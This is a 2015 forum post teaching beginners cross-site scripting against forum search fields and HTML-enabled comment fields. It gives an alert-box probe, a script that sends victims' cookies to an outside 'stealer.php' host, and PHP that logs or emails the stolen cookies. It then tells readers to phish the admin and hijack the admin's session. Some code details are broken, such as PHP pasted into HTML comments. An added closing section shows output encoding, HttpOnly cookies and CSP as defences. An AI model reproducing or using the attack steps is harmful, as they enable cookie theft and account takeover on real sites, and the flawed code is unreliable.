
#1 05-21-2015, 12:19 PM
Newer
 
XSS tutorial for Newbee's

XSS can be used in 2 conditions.
Sometimes there are forums that have particular fields that allow HTML posts..
Or a vulnerability in the search field.

A vulnerable search field that allows HTML searches and uses $_GET function instead of $_POST
Okay so.. let's talk about the search field first. It's easier lol

Testing Vulnerability
Write in the search bar: <script>alert("XSS")</script>
Now an alert message should show XSS
If it didn't, then the search field is unexploitable.

Now to get a link that would redirect to your cookie stealer put this in the search:

Code:
<script language="Javascript">
1document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>
and send the link to the admin as a PM ..

Cookie stealer code :

Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
Upload this to your host, then replace the link in the first JavaScript. Now PM the admin or any user u wanna hack.

As soon as the admin opens the link, the cookie should be saved in a text file on your host...

Now download Firefox and Cookie editor add-on. ( I'm too lazy to post links )

Put the cookies in the cookie editor and go to the website. You should be logged on as admin ( If his session didn't end yet )

Now F**K that forum up !

Exploiting posts

You can exploit posts such as posting a comment on the admin's profile ( which allows HTML posts 99% of the time )

Post this

Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
mail("me**mydomain.com", "Cookie stealer report", $cookie);
?>
Change the me**mydomain.com to your email. The cookies should be mailed to you.

Now as usual, add the cookies using your sexy cookie editor and then go to the website. If you're lucky enough his session would not have expired yet..
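
The defensive counterpart to the search-field case in the post, as an added example that is not part of the original post: the reflected search term is HTML-encoded before it is written into the page, and the session cookie is issued with `HttpOnly` so `document.cookie` cannot read it. The function names, the `sid` cookie name and the policy string are assumptions made for illustration.

```javascript
// Added example, not code from the post. escapeHtml, renderSearchPage,
// renderSearchPageUnsafe and sessionCookieHeader are hypothetical helpers.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, an attribute value or an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the GET parameter is concatenated into the page as markup.
function renderSearchPageUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened form: the same parameter is reflected as text only.
function renderSearchPage(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Session cookie that page script cannot read (HttpOnly), that is sent only
// over TLS (Secure) and that is withheld from cross-site subrequests (SameSite).
function sessionCookieHeader(sessionId) {
  return `Set-Cookie: sid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Defence in depth: a policy that refuses inline script if an encoding step is missed.
const CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'";

// Constructed sample input: the probe string quoted in the post.
const probe = '<script>alert("XSS")</script>';
console.log(renderSearchPageUnsafe(probe)); // markup reaches the browser intact
console.log(renderSearchPage(probe));       // rendered as inert text
console.log(sessionCookieHeader('constructed-session-id'));
console.log(CSP_HEADER);
```

Comment and profile fields that accept HTML need the same encoding on output, or an allow-list sanitizer if some markup must be kept.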

